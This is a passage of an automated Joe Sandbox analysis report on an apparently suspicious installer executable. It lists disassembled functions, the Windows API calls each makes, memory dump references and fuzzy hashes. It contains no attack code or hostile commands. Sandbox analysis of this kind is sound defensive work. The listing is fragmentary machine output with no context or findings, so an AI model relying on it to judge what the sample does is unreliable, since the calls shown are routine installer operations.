                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                                                                  • Part of subcall function 00405A6E: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                                                                                                                                • API String ID: 1892508949-670666241
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,00000000,00425A20,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,00000000,00425A20,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,00403418), ref: 004055FA
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll), ref: 0040560C
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                                                                                                                                • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 334405425-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00401C0B
                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
                                                                                                                                                                                                                                  • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                                                                                                                                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,00000000), ref: 00406779
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Global$AllocFreelstrcatlstrlen
                                                                                                                                                                                                                                • String ID: Call
                                                                                                                                                                                                                                • API String ID: 3292104215-1824292864
                                                                                                                                                                                                                                • Opcode ID: 76e1c53c6065f8e9472f18b9dfeefb14709868848a4ccda9946b373e0273bbaf
                                                                                                                                                                                                                                • Instruction ID: 7c0f58a685d1fc6dd3685da305ee1819882fb4420ac17dc2787245939102450a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76e1c53c6065f8e9472f18b9dfeefb14709868848a4ccda9946b373e0273bbaf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B21D872904210EBDB20AFA8EE84A5E73B4EB04715755063BF552F72D0D7B8AC414B9D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                                                                                                                                                                                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E4
                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Enum$CloseValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 397863658-0
                                                                                                                                                                                                                                • Opcode ID: ffba938f7f9a9646bc05872a2a2d1d1e7365e509dd4e3e586e1c2ded03845b65
                                                                                                                                                                                                                                • Instruction ID: 08080f496e1fbaad801da7c4a2f11cdf7a22a5a493a276a89d416976773fa01e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffba938f7f9a9646bc05872a2a2d1d1e7365e509dd4e3e586e1c2ded03845b65
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61C0EBB85E44966D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00406008: GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                                                                                                                                                                                                  • Part of subcall function 00406008: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406021
                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,?,?,00000000,00405DE3), ref: 00405C1C
                                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(?,?,?,00000000,00405DE3), ref: 00405C24
                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C3C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1655745494-0
                                                                                                                                                                                                                                • Opcode ID: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
                                                                                                                                                                                                                                • Instruction ID: 0274c5225d47ddc366315f3a2fda4b694ad97aa72442a0e2fcdbaf00fd257d87
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4E0E53110CF9156E61457309E08F5F2AD8EF86715F05493EF892B10C0CBB848068E6A
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3356406503-0
                                                                                                                                                                                                                                • Opcode ID: 2ada99d8dff58305b15045bad38a44ab5f8654d60486fc4be6a411efa208bc5f
                                                                                                                                                                                                                                • Instruction ID: 3e5dab0bbcc9b7b4348569693e39c51bc0b27c59e8ea0ed6abb05ebc10b9b344
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ada99d8dff58305b15045bad38a44ab5f8654d60486fc4be6a411efa208bc5f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F116D71900219EADF14DFA4DA589AE77B4FF04345B20443BE401B62C0E7B88A45EB5D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                                                                                                                                                                • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                                                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Window$EnableShow
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1136574915-0
                                                                                                                                                                                                                                • Opcode ID: 86975ae7e55868c6fa7f0a653ee38b5bdebf79f927548a24dbd204ed482989db
                                                                                                                                                                                                                                • Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 86975ae7e55868c6fa7f0a653ee38b5bdebf79f927548a24dbd204ed482989db
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                                                                                                                                                                  • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                                                                                                                                                                  • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                                                                                                                                                                                                                  • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2547128583-0
                                                                                                                                                                                                                                • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                                                                                                                                • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 415043291-0
                                                                                                                                                                                                                                • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                                                                                • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                                                                                                                                                                                                • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406021
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                                                                • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00405AFF
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1375471231-0
                                                                                                                                                                                                                                • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                                                                                • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileWrite
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                                                                                                • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                                                                • Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                                                                • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406438,?,00000000,?,?,Call,?), ref: 004063CE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Open
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 71445658-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FilePointer
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 973152223-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2492992576-0
                                                                                                                                                                                                                                • Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                                                                                                                                                                                • Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404F29
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                                                                                                                                                                                                                • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
                                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                                                                                                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00405000
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                                                                                                                                                                                                  • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00405162
